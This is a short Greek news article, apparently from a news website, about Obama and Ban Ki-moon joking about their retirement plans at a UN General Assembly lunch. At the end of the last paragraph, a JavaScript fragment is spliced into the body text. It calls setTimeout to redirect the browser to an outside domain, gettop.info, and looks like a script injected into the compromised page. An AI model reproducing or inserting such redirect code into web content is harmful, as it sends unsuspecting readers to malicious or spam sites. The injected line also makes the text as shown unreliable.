Τα συνταξιοδοτικά πλάνα Ομπάμα και Μπαν Κι Μουν

0
15

 

Παράλληλη αλλαγή ηγεσίας θα σημειωθεί τόσο στον Λευκό Οίκο όσο και στον ΟΗΕ καθώς ο Μπαράκ Ομπάμα αποχωρεί από τον προεδρικό θώκο ενώ και ο Μπαν Κι Μουν συνταξιοδοτείται ως γενικός γραμματέας.

Οι δύο άνδρες συναντήθηκαν σε γεύμα στο πλαίσιο της ΓΣ του ΟΗΕ και αντάλλαξαν συνταξιοδοτικά πλάνα.

«Κύριε Πρόεδρε, πρέπει να σκεφτούμε τι θα κάνουμε μετά την συνταξιοδότησή μας» είπε ο Μπαν Κι Μουν προς τον Ομπάμα.

«Θα σας προκαλούσα σε ένα παιχνίδι γκολφ, μάλλον, αλλά παρακαλώ μην με προκαλέσετε σε ένα αγώνα μπάσκετ» συνέχισε προς τον πρόεδρο των ΗΠΑ, ο οποίος του απάντησε πως θα μπορούσαν να το κάνουν αυτό.

Αυτή ήταν η τελευταία παρουσία και για τους δύο σε Γενική Συνέλευση του ΟΗΕ με τον θεσμικό τους ρόλο. Ο Ομπάμα ολοκληρώνει δύο προεδρικές θητείες κι αποχωρεί από τον Λευκό Οίκο έπειτα από οκτώ χρόνια. Επίσης, ο Μπαν Κι Μουν τέλεσε δύο θητείες ως γενικός γραμματέας του ΟΗΕ παραμένοντας δέκα χρόνια στην ηγεσία του Οργανισμού.

Μετά τα αστεία περί συνταξιοδότησης, ευχαρίστησε ο ένας τον άλλο για την προσφορά του. Ο Μπαν Κι Μουν είπε προς τον Ομπάμα: «Οι προσπάθειες και η πολιτική σας στήριξη προώθησαν τους σόχους των Ηνωμένων Εθνών ενώ παραμείναμε σταθεροί στις αξίες και τους σκοπούς μας: ελευθερία, ισότητα, δημοκρατία και ειρήνη«.

Ο Ομπάμα εξήρε το έργο και τον ρόλο του Μπαν τονίζοντας πως η ιστορία της ζωής του υπήρξε παράδειγμα για πολλούς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here